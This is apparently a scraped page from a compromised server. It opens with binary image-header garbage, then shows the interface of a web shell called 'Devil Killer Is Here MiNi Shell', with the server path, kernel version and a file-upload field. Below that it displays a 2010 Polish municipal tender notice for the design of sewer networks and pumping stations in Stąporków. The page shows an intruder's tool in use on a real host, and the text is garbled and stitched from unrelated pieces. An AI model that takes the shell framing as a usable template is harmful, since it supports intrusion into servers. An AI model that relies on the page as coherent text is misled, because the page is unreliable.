JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100701/190990-N-2010.html

<p class="kh_header"><b>Stąporków: Wykonanie opracowania dokumentacji budowlano - wykonawczej na aktualnych podkładach geodezyjnych wraz z kosztorysami, specyfikacją techniczną wykonania i odbioru robót, informacja BIOZ, studium wykonalności i uzyskaniem pozwolenia na budowę: sieci kanalizacji sanitarnej grawitacyjno tłocznej wraz z przykanalikami w Stąporkowie przy ulicach: 1-ego Maja, Górniczej, Koneckiej, Górnej, Kościuszki, B.Prusa, Wspólnej, Lipowej, Gutów, Spacerowej, Niekłańskiej, Odlewniczej, Nieborowskiej, Piaskowej, Miłej i Piłsudskiego wraz z pompowniami ścieków.</b><br>
<b>Numer ogłoszenia: 190990 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stąporków , ul. Piłsudskiego 132a, 26-220 Stąporków, woj. świętokrzyskie, tel. 041 3741122, faks 041 3741860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staporkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie opracowania dokumentacji budowlano - wykonawczej na aktualnych podkładach geodezyjnych wraz z kosztorysami, specyfikacją techniczną wykonania i odbioru robót, informacja BIOZ, studium wykonalności i uzyskaniem pozwolenia na budowę: sieci kanalizacji sanitarnej grawitacyjno tłocznej wraz z przykanalikami w Stąporkowie przy ulicach: 1-ego Maja, Górniczej, Koneckiej, Górnej, Kościuszki, B.Prusa, Wspólnej, Lipowej, Gutów, Spacerowej, Niekłańskiej, Odlewniczej, Nieborowskiej, Piaskowej, Miłej i Piłsudskiego wraz z pompowniami ścieków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
Wykonanie opracowania dokumentacji budowlano - wykonawczej na aktualnych podkładach geodezyjnych na budowę:
1. sieci kanalizacji sanitarnej grawitacyjno tłocznej wraz z przykanalikami w mieście Stąporków przy ulicach:
a) ul. 1- ego Maja,na odcinku od Nr 11 do końca linii zabudowy, dł. ok. 1,80 km kanału grawitacyjnego i ok. 1,0 km rurociągu tłocznego wraz z przykanalikami w ilości ok. 55 szt..Od nr 11 do ul. Górniczej - zarządca drogi - Gmina Staporków.
Od ul. Górniczej do końca linii zabudowy - zarządca drogi - Zarząd Dróg Powiatowych w Końskich, ul. Spacerowa.
b) ul. Koneckiej,na odcinku od ul. Polnej do ul. Górniczej, dł. ok. 3,00 km kanału grawitacyjnego i ok. 0,40 km rurociągu tłocznego wraz z przykanalikami w ilości ok. 50 szt.Zarządca drogi - Generalna Dyrekcja Dróg Krajowych i Autostrad w Kielcach, 
ul. Paderewskiego.
c) ul. Górnej,dł. ok.1,20 km kanału grawitacyjnego wraz z przykanalikamiw ilości ok. 16 szt..Zarządca drogi - Gmina Stąporków.
d)  ul. Kościuszki,dł. ok. 1,00 km kanału grawitacyjnego wraz z przykanalikami w ilości ok. 64 szt.Zarządca drogi - Gmina Stąporków.
e) ul. Górniczej,na odcinku od ul. 1- ego Maja do ul. Kościuszki, dł. ok. 0,5 km wraz z przykanalikami w ilości ok. 10 szt. Zarządca drogi - Zarząd Dróg Powiatowych w Końskich, ul. Spacerowa.
f) ul. B.Prusa,na odcinku od ul. Górniczej do ul. Niekłańskiej, dł. ok. 1,40 km kanału grawitacyjnego i ok. 0,70 km rurociągu tłocznego wraz z przykanalikami w ilości ok. 32 szt. Zarządca drogi - Gmina Stąporków.
g)  ul. Lipowej,dł. ok. 0,20 km kanału grawitacyjnego wraz z przykanalikami w ilości ok.11 szt.Zarządca drogi - Gmina Stąporków.
h) ul. Wspólnej,dł. ok. 0,40 km kanału grawitacyjnego wraz z przykanalikami w ilości ok. 10 szt.Zarządca drogi - Gmina Stąporków.
i) ul. Gutów, dł. ok. 0,20 km kanału grawitacyjnego wraz z przykanalikami w ilości ok. 9 szt.Zarządca drogi - Gmina Stąporków.
j)  ul. Spacerowej,dł. ok. 0,30 km kanału grawitacyjnego wraz z przykanalikami w ilości 6 szt. Zarządca drogi - Gmina Staporków.
k) ul. Niekłańskiej, dł. ok. 0,35 km rurociągu tłocznego wraz z przykanalikami w ilości ok. 10 szt.Zarządca drogi - Zarząd Dróg Powiatowych w Końskich, ul. Spacerowa.
l) ul. Odlewniczej, dł. ok. 0,50 km kanału grawitacyjnego i ok. 0,20 km rurociągu tłocznego wraz z przykanalikami w ilości ok. 4 szt.Zarządca drogi - Zarząd Dróg Powiatowych w Końskich, ul. Spacerowa.
m) ul. Nieborowskiej,dł. ok. 0,20 km kanału grawitacyjnego wraz z przykanalikami w ilości ok. 9 szt. Zarządca drogi - Gmina Stąporków.
n)  ul. Piłsudskiego, na odcinku od ul. 1000 - lecia do końca linii zabudowy, dł. ok. 0,30 km kanału grawitacyjnego i ok. 0,15 km rurociągu tłocznego wraz z przykanalikami w ilości ok. 10 szt. Zarządca drogi - Generalna Dyrekcja Dróg Krajowych i Autostrad w Kielcach, ul. Paderewskiego.
o) ul. Miłej, na odcinku od rz. Czarnej do końca linii zabudowy, dł. ok. 1,80 km kanału grawitacyjnego i ok. 0,75 km rurociągu tłocznego wraz z przykanalikami w ilości ok. 20 szt. Zarządca drogi - Zarząd Dróg Powiatowych w Końskich, ul. Spacerowa.
p) ul. Piaskowej, dł. ok. 0,40 km kanału grawitacyjnego wraz  z przykanalikami w ilości ok. 8 szt. Zarzadca drogi - Gmina Stąporków.

z uwzględnieniem budownictwa mieszkaniowego i innych budynków zlokalizowanych  przy ww. ulicach.

2. pompownie ścieków wraz z zasilaniem energetycznym, monitoringiem, droga dojazdową, ogrodzeniem oraz zagospodarowaniem terenu.

Ścieki z ww. ulic należy odprowadzić do istniejącej oczyszczalni ścieków zlokalizowanej w Stąporkowie, przy ul. Odlewniczej.
Eksploatujący oczyszczalnię ścieków - Zakład Gospodarki Komunalnej i Mieszkaniowej w Stąporkowie, przy ul. Piłsudskiego 132 A.

3. Dokumentację budowlano - wykonawczą należy opracować zgodnie z obowiązującymi przepisami szczegółowymi i wykonawczymi oraz przepisami Prawa budowlanego (t.j. Dz.U. z 2006 r. Nr 156, poz.1118 z późniejszymi zmianami) i podzielić na etapy realizacyjne.
   Jako załącznik do SIWZ załączono koncepcję na budowę ww. sieci i pompowni ścieków 
   ( koncepcja jest tylko dokumentem pomocniczym do opracowania dokumentacji projektowej).

4. Projektowane sieci kanalizacji sanitarnej winny spełniać standardy jakości i ochrony środowiska określone w stosownych przepisach.

5. Dokumentacja miedzy innymi winna zawierać:
    - przedmiot opracowania,
    - podstawy opracowania,
    - ogólny opis przedmiotu zamówienia,
    - profile podłużne kanałów, przykanalików,
    - warunki gruntowo - wodne,
    - ilości odprowadzonych ścieków, obliczenia hydrauliczne,
    - opis kanałów z podziałem na tłoczne i grawitacyjne,
    - podstawowe metody realizacji z uwzględnieniem technik odwodnienia wykopów wraz z ich obliczeniem,
    - niezbędne elementy konstrukcji i obiektów.

6. Zakres usług projektowych powinien obejmować:

6.1	uzyskanie na własny koszt podkładów sytuacyjno - wysokościowych stosownie do wymogów jakie stawiane są przez przepisy Prawa budowlanego,
6.2	 ustalenie geotechnicznych warunków posadowienia w oparciu o wszystkie obowiązujące przepisy prawne,
6.3	uzyskanie decyzji o Środowiskowych Uwarunkowaniach, w przypadku konieczności jeje wymagania,
6.4	ewentualnie - sporządzenie Raportu o oddziaływaniu inwestycji na środowisko.
Jako załącznik do SIWZ - mapa m. Stąporkowa z propozycjami nowego potencjalnego obszaru sieci NATURA 2000 z naniesionymi granicami tego terenu.
Zgodnie z propozycjami sieci NATURA 2000 obejmuje ona Dolinę rz. Czarnej a także tereny położone pomiędzy ul. Górniczą a ul. B. Prusa i przy ul. Miłej.
6.5	uzyskanie decyzji o ustaleniu lokalizacji celu publicznego,
6.6	pozyskanie wypisów z ewidencji gruntów oraz kopii map ewidencyjnych gruntów dla obszarów przeznaczonych pod inwestycję i obszarów na które ta inwestycja będzie oddziaływać,
6.7	przygotowanie dokumentacji terenowo - prawnej zapewniającej zamawiającemu dysponowanie terenami pod obiekty objęte przedmiotem niniejszego zamówienia a w szczególności uzyskanie przez Projektanta, zgód właścicieli terenów, przez które przebiegać będą obiekty liniowe na czasowe zajęcie ich nieruchomości oraz uzyskanie przez projektanta pisemnych zgód właścicieli nieruchomości na umieszczenie obiektów budowlanych  w gruncie oraz uzyskanie zgód na wykupienie terenu w przypadku projektowania pompowni.
      Wykup terenu pod pompownie przeprowadzi Zamawiający.
6.8	uzyskanie decyzji właściwego zarządcy drogi o uzgodnieniu przebiegu trasy sieci kanalizacji sanitarnej w pasie drogowym lub jezdni wraz z wymaganymi przez tych zarządców projektami branżowymi,
6.9	uzyskanie zezwolenia od zarządcy kolei o uzgodnieniu przebiegu trasy sieci kanalizacji sanitarnej w pasie kolejowym wraz z wymaganiami przez tego zarządcę projektami branżowymi,
6.10	uzyskanie warunków technicznych do projektowania:
6.10.1	od eksploatującego oczyszczalnię ścieków, sieci kanalizacji sanitarnej i pompowni ścieków - z Zakładu Gospodarki Komunalnej i Mieszkaniowej w Stąporkowie, ul. Piłsudskiego 132 A,
6.10.2	od użytkownika urządzeń energetycznych - Rejon Energetyczny w Końskich, ul. Krakowska 44, na zasilanie energetyczne pompowni,
6.11	opracowanie operatów wodno - prawnych na przekroczenie rz. Czarnej i ewentualnie   
            innych cieków oraz uzyskanie pozwolenia wodnoprawnego,
6.12	uzyskanie wszystkich decyzji, uzgodnień, opinii i pozwoleń wymaganych przepisami szczegółowymi w tym również uzgodnień branżowych,
6.13	uzyskanie decyzji ostatecznej o zatwierdzeniu i udzieleniu pozwolenia na budowę sieci kanalizacji sanitarnej wraz z przykanalikami i pompowni scieków,
6.14	wykonanie kompletnego projektu budowlano - wykonawczego w sześciu egzemplarzach + wersja elektroniczna dokumentacji do zamieszczenia na stronie internetowej Urzędu Miejskiego w Stąporkowie, tożsama z projektem w wersji papierowej - (skan dokumentacji z uzgodnieniami branżowymi na rysunku oraz podpisami Projektantów), odrębnie na sieć kanalizacji sanitarnej i przykanalików oraz pompownie ścieków,
6.15	opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych ( w jednym egzemplarzu + wersja elektroniczna umożliwiająca edycję) zgodnie z (Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. z 2004 r Nr 202, poz. 2072 ze zm)
6.16	opracowanie przedmiarów robót ( 2 egz. + wersja elektroniczna umożliwiająca edycję) odrębnie dla każdej ulicy - na budowę sieci kanalizacji sanitarnej tłocznej i grawitacyjnej, przykanalików, pompowni ścieków wraz z instalacją elektryczną, monitorowaniem, drogą dojazdowa, ogrodzeniem o zagospodarowaniem terenu,
6.17	opracowanie kosztorysów inwestorskich ( 2 egzemplarze + wersja elektroniczna) odrębnie dla każdej ulicy - na budowę sieci kanalizacji sanitarnej tłocznej i grawitacyjnej, przykanalików i pompowni ścieków wraz z instalacją elektryczną, monitorowaniem, drogą dojazdową, ogrodzeniem i zagospodarowaniem terenu.
Punkt 6.16 i 6.17 należy przygotować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz.U. z 2004 r, Nr 130, poz. 1389),
6.18	opracowanie informacji dotyczącej Bezpieczeństwa i Ochrony Zdrowia,
6.19	opracowanie Studium wykonalności - 5 egz. zgodnie z obowiązującymi przepisami w wersji papierowej i elektronicznej,
6.20	zaopiniowanie dokumentacji budowlano - wykonawczej na budowę sieci kanalizacji sanitarnej grawitacyjno tłocznej wraz z przykanalikami i pompowni ścieków przez Zakład Gospodarki Komunalnej i Mieszkaniowej w Stąporkowie, przy ul. Piłsudskiego 132 A.
Wszystkie dokumenty występujące w oryginale należy umieścić w egzemplarzu nr 1.

7. W cenie wykonanie dokumentacji należy uwzględnić koszty związane z uzyskaniem map sytuacyjno - wysokościowych w tym ich aktualizację bądź opracowanie map do celów projektowych, wszystkich uzgodnień, decyzji, opinii i pozwoleń m.in. ostatecznej decyzji o pozwoleniu na budowę sieci kanalizacji sanitarnej wraz z przykanalikami i pompowni ścieków oraz koszty nadzoru autorskiego w czasie realizacji inwestycji na każde żądanie Zamawiającego i aktualizacja kosztorysów inwestorskich.
8. Wykonawca projektu sprawować będzie nadzór autorski ( bez dodatkowego wynagrodzenia) w zakresie obejmującym w szczególności:
a) wyjaśnienia Zamawiającemu i Wykonawcy wątpliwości dotyczące projektu budowlano - wykonawczego i zawartych w nim rozwiązań oraz ewentualne uzupełnienia szczegółów dokumentacji projektowej,
b) uzgodnienie z zamawiającym i Wykonawcą robót budowlanych możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej w odniesieniu do materiałów oraz zawartych rozwiązań technologicznych  czy konstrukcyjnych,
9. Wykonanie opracowania dokumentacji budowlano - wykonawczej na budowę sieci kanalizacji sanitarnej grawitacyjno tłocznej wraz  z przykanalikami i pompowni ścieków należy podzielić na następujące etapy realizacyjne, które będą stanowić podstawę do  zafakturowania:
a) przekazanie zamawiającej do zaakceptowania materiałów do wydania decyzji lokalizacyjnej celu publicznego i materiałów do wydania decyzji środowiskowych na budowę sieci kanalizacji sanitarnej grawitacyjno tłocznej wraz z przykanalikami i pompowniami scieków,
b)  przekazanie Zamawiającej pozytywnych uzgodnień ZUD projektowanej trasy sieci kanalizacji sanitarnej grawitacyjno tłocznej wraz z przykanalikami i pompowni ścieków,
c)  przekazanie Zamawiającej kompletnego projektu budowlano - wykonawczego wraz  z kosztorysami i specyfikacja techniczna, informacją BIOZ, studium wykonalności będących przedmiotem zamówienia wraz z decyzją ostateczną o pozwoleniu na budowę.
Wykonawca na realizację powyższego załączy do oferty harmonogram terminowo finansowy przedmiotu zamówienia, który umożliwi wypełnienie umowy w § 2i § 3 wraz ze składnikami cenotwórczymi służące wyliczeniu oferowanej ceny netto i tak:
- kanały grawitacyjne - cena netto za 1 km
- rurociągi tłoczne - cena netto za 1 km
- pompownie ścieków - cena netto za 1 pomp.
- Studium wykonalności - kpl
- Opracowania z zakresu ochrony środowiska  - kpl

10. Wszelkie prace projektowe lub czynności nie opisane wyżej a wynikające z procedur określonych w przepisach szczególnych, niezbędne do właściwego i kompleksowego opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.

11. Wszystkie dokumenty w formie elektronicznej należy przekazać:
      - w wersji źródłowej w programie, w którym zostały utworzone,
      - w programie umożliwiającym wydruki w formie PDF,
      - kosztorys inwestorski w programie typu Norma lub Winbud.
      Projektant zobowiązuje się do aktualizacji kosztorysów inwestorskich wraz z 
      przedmiarami ( na pisemne wezwanie Zamawiającej) do czasu wyłonienia Wykonawcy  
      robót nie dłużej niż 2 lata,
      - na nośnikach elektronicznych.

12. Do obowiązków Wykonawcy należy zaopatrzenie dzieła w pisemne oświadczenie, że dostarczona dokumentacja jest wykonana zgodnie z umową, obowiązującymi przepisami techniczno - budowlanymi i normami oraz, że jest kompletna z punktu widzenia celu, któremu służy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunków na podstawie wymaganych dokumentów i oświadczeń w oparciu o zasadę spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy udokumentują należyte wykonanie usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że te usługi zostały wykonane lub są wykonywane należycie tj. min. jedna usługa projektowa związana z zaprojektowaniem/projektowaniem sieci kanalizacji sanitarnej grawitacyjno tłocznej i pompowni scieków.Zamawiający dokona oceny spełnienia warunków na podstawie wymaganych dokumentów i oświadczeń w oparciu o zasadę spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga przedstawienia dokumentów potwierzdzających spełnienie tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy dysponują w celu wykonania zamówienia:
   - przynajmniej 2 osoby posiadające uprawnienia budowlane o specjalności instalacyjnej w zakresie sieci kanalizacyjnych , 1 osobę  posiadającą uprawnienia budowlane o specjalności instalacji w zakresie sieci elektrycznych.  Zamawiający dokona oceny spełnienia warunków na podstawie wymaganych dokumentów i oświadczeń w oparciu o zasadę spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę gwarancyjna nie mniejsza niż 50 000 PLN. Zamawiający dokona oceny spełnienia warunków na podstawie wymaganych dokumentów i oświadczeń w oparciu o zasadę spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
